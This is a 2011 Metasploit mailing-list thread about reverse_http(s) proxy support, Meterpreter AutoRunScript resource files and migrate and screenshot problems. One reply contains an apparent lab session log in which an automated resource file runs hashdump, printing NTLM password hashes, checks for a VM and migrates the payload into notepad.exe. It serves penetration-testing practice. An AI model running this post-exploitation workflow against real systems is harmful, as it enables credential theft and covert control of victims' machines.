Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: News from Metasploit 4.

From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 16:40:11 -0500
Hi Carlos,

Thanks for heads-up. But do you know why everytime that I call
screenshot or screengrab the lynx browser is called? There is a way to
disable it?

run migrate -f  crash here, so I have to use run
post/windows/manage/migrate, but the old process name is still on the
task manager list even when the migration is completed. Anyway to ask
for run post/windows/manage/migrate kill the old process?

Thanks

On Sat, Aug 27, 2011 at 4:02 PM, Carlos Perez
<dark0perator () pauldotcom com> wrote:

screenshot is now part of stdapi so need to load espia, migrate -f works finel for me

msf  exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.115:1572) at 2011-08-27 17:00:17 -0400
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.115:1572) processing AutoRunScript 'multi_console_command -rc 
/tmp/sample.rc'
[*] Running Command List ...
[*]     Running command sysinfo
Computer        : CARLOS-192FCD91
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
[*]     Running command getuid
Server username: CARLOS-192FCD91\Administrator
[*]     Running command load priv
[-] The 'priv' extension has already been loaded.
[*]     Running command hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[*]     Running command run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*]     Running command run migrate -f
[*] Current server process: meter_mac1.exe (2752)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2896
[*] New server process: notepad.exe (2896)
[*]     Running command screenshot
Screenshot saved to: /Users/carlos/Development/msf4/nGRCugLJ.jpeg

msf  exploit(handler) > cat /tmp/sample.rc
[*] exec: cat /tmp/sample.rc

sysinfo
getuid
load priv
hashdump
run checkvm
run migrate -f
screenshot
msf  exploit(handler) >

On Aug 27, 2011, at 2:36 PM, Richard Miles wrote:


Hi Carlos

I know you are the creator of this resources and I have tested
multi_console_command script  and now the module
post/multi/gather/run_console_rc_file, but they never worked to me.
Maybe I'm doing something wrong.

I tried call both of them before and after call "use
exploit/multi/handler", and when I get the connection back from
meterpreter nothing happens, the commands are never executed, or at
least the output is never displayed on the screen.

I'm feeling very foul. There is a chance for you show a step by step
how do you make it?

I tested both now again with metasploit 4.

Thanks.


On Fri, Aug 26, 2011 at 4:12 PM, Carlos Perez
<dark0perator () pauldotcom com> wrote:

AutoRunScript is for Meterpreter Scrips/Post Modules, what you are showing would be considered a resource file, 
look at the multi_console_command script or the post module post/multi/gather/run_console_rc_file to achieve what 
you want and use that resource file as an option.

On Aug 26, 2011, at 4:10 PM, Richard Miles wrote:


Hi Egypt,

It's awesome, thanks for information. Also, do you have a working
version for 64 bits?

Any follow-up on the other 2 questions on the e-mail?

Thanks

On Fri, Aug 26, 2011 at 9:20 AM,  <egypt () metasploit com> wrote:

Yes, reverse_http(s) both use the WinInet API, and as such, use IE's
proxy configuration, including credentials.

egypt

On Fri, Aug 26, 2011 at 2:28 AM, Richard Miles
<richard.k.miles () googlemail com> wrote:

Hey Patrick,

Awesome, with the new reverse_http or reverse_https? Metasploit 4?

Thanks

On Thu, Aug 25, 2011 at 7:37 PM, Patrick Webster <patrick () aushack com> wrote:

Hey Richard,

I cannot guarantee 100%, but re: point #1, I have successfully used
the stager to get around proxies with auth about 2 months ago.

-Patrick

On Fri, Aug 26, 2011 at 8:42 AM, Richard Miles
<richard.k.miles () googlemail com> wrote:

Hi

I friend of mine was talking about some great improvements at
Metasploit 4, I checked the blog and it talks very briefly about it,
what more called my attention is that reverse_http and reverse_https
was updated and meterpreter scripts / resources too.

I have 3 questions...

1 - The new reverse_http and reverse_https now are as good as passiveX
was? I mean, we can use it completely over http or https (even the
stager) and the payload is smart enough to get proxy IP and port from
browser and re-use the same credential (in case that proxy require
auth)?



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework





_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



-----BEGIN PGP SIGNATURE-----

iQEcBAEBAgAGBQJOWVtWAAoJEHEPn91U05XJ8N4H/0XVJN8rYFGxgWU8wHJ43Vui
y5yaXFWMaZqm7OadfM3qlBbJ6vAi7YuIDMAZ/UQs4k167OCu/IsPMpG21iR7Wngt
g2HlMCLLCoC74NNQ5gw9F5sAAAxSUe5HVUTXUFFTTA/ljrKg8FlpBH4sQGCngwMx
aZfw6VWdVRZMEPynMxOPvqt4XCgNsWfAr0hKz5Bhm8kesUAm/xcAnA5RXQM6Ctb9
SYxAeLsBQ7qsVAv8XWJJRhaln838Ajh8ibDET2d37YKYkJ1VSChXVCstz1oCHhnB
34XDjfHwN90O4JD5r/tMtNKbeT+u222R2M3r+MjZKzTUxnmGxDEGbNMBOANXqrA=
=AaQS
-----END PGP SIGNATURE-----



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: